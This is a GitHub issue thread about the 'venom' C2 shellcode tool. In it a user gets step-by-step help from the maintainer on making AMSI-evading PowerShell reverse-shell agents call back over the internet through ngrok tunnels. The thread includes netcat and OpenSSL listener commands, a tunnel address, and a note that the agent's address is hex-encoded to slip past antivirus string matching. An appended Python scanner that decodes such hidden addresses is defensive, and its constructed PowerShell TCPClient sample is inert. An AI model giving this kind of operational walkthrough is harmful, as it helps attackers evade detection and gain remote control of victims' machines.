r00t-3xp10it / venom

venom - C2 shellcode generator/compiler/handler

problem in getting a connection on public network / WAN #76

Open ricko2991 opened 4 years ago

ricko2991 commented 4 years ago

Hi, I want to access a connection from a different network by sending a payload containing my ip address, and send it using the http port forwarding service, namely LocalXpose, but I don't seem to get a return connection from the target.

[screenshot 1: Localhost]

[screenshot 2: port forwarding service]

[screenshot 3: Listener]

I tried the method above and it might not work. So I have to use tcp. So the payload uses the localxpose port and I, as the listener, use my local port. Okay, this is my problem: when I use the tcp port provided by localxpose, it will also be used as a listener. So how can I switch that listener back to my localhost? The listener should use my local port but I can't change it.

r00t-3xp10it commented 4 years ago

see this: https://www.youtube.com/watch?v=fPF-slJLOlk&t=77s

ricko2991 commented 4 years ago

Hi, @r00t-3xp10it I have no problem in the 1-7 payload categories when port forwarding. But I have a problem with Amsi evasion, I can't do port forwarding with it.

ricko2991 commented 4 years ago

Have you tried it and succeeded? Somehow I failed... can you show the host and the port you are using on the payload and also the listeners you used.


Hi, I try this: 2.tcp.ngrok.io:14598 --> localhost:1111

Payload options(ngrok) LPORT : 14598 LHOST : 13.59.15.185 or LHOST : 2.tcp.ngrok.io

Listen
1º nc -lvp 0.0.0.0 14598 ==> invalid local port 0.0.0.0
2º nc -nlvp 1111 ==> Not connected / nc -lvp 1111 ==> not connected
3º nc -nlvp 14598 ==> not connected
4º nc -s 127.0.0.1 -nlvp 14598 ==> not connected
5º nc -s 127.0.0.1 -nlvp 1111 ==> not connected

r00t-3xp10it commented 4 years ago

ok lets try this step by step ... Check this video for reference: https://www.youtube.com/watch?v=8YswLITdE7g


1º - ./ngrok tcp 14598
2º - chose venom - amsi evasion agent nº 2
3º - LHOST == 2.tcp.ngrok.io (ngrok)
4º - LPORT == 14598 (ngrok)
5º - goto /var/www/html and port the Agent (Client.ps1) to target machine (manually)
6º - start venom listener (OpenSSL)
7º - On target machine execute the Client.ps1


Final notes:

Amsi evasion agents require the Apache2 webserver to deliver files to target host ... so venom users need to port forward the Client.ps1 connection AND the apache2 webserver .. "But In this exercise we are NOT going to port forward the apache2, just to test if the client connects back to the listener".. OpenSSL agents require openssl s_server -quiet -key key.pem -cert cert.pem -port 14598 <- openssl listener, not Netcat

ricko2991 commented 4 years ago

Thank you, now it's working. And also for example I am using agent no.3 on amsi and it is covered by "hex obfuscation" how do I decode a script covered by hex?

r00t-3xp10it commented 4 years ago

the only thing encoded (hex) in agent nº 3 is the ip address ... This is one attempt to hide the ip address 'string' from amsi string detection inside Client.ps1 ... hex

how to decode hex
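
Since the agent only hex-encodes the C2 address to dodge plain string matching, an analyst looking at a fetched .ps1 can undo that with a few lines. The scanner below is an added example, not venom's code and not the real Client.ps1: the PowerShell snippet inside it is constructed for the test, the address 203.0.113.10 is a documentation-range placeholder, and it also catches an address buried inside a longer hex-encoded string such as a URL.

```python
import re
import ipaddress

# Constructed sample in the style the thread describes: the address is kept as a
# hex string and turned back into characters at runtime. Not venom's Client.ps1.
SAMPLE_PS1 = r'''
$h = "3230332e302e3131332e3130"
$a = -join ($h -split '(..)' | ? { $_ } | % { [char][convert]::ToInt32($_,16) })
$c = New-Object System.Net.Sockets.TCPClient($a, 14598)
'''

# Even-length runs of at least 14 hex digits (7 ASCII chars, the shortest dotted quad).
HEX_RUN = re.compile(r'\b(?:[0-9a-fA-F]{2}){7,}\b')
# Dotted-quad candidates inside decoded text; validated with ipaddress below.
DOTTED_QUAD = re.compile(r'(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)')


def decode_hex_ascii(run):
    """Return the printable-ASCII text a hex run encodes, or None if it is not one."""
    try:
        raw = bytes.fromhex(run)
    except ValueError:
        return None
    if not all(0x20 <= b < 0x7F for b in raw):
        return None  # binary data or a hash, not an encoded string
    return raw.decode("ascii")


def find_hex_encoded_ips(text):
    """Return (hex_run, decoded_text, ip) for every hex run hiding a valid IPv4 address."""
    hits = []
    for m in HEX_RUN.finditer(text):
        decoded = decode_hex_ascii(m.group(0))
        if decoded is None:
            continue
        for quad in DOTTED_QUAD.findall(decoded):
            try:
                ip = ipaddress.IPv4Address(quad)  # rejects octets > 255 etc.
            except ValueError:
                continue
            hits.append((m.group(0), decoded, str(ip)))
    return hits


if __name__ == "__main__":
    for run, decoded, ip in find_hex_encoded_ips(SAMPLE_PS1):
        print(f"{run} -> {decoded!r} (IPv4 {ip})")
```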

ricko2991 commented 4 years ago

Thank you 👍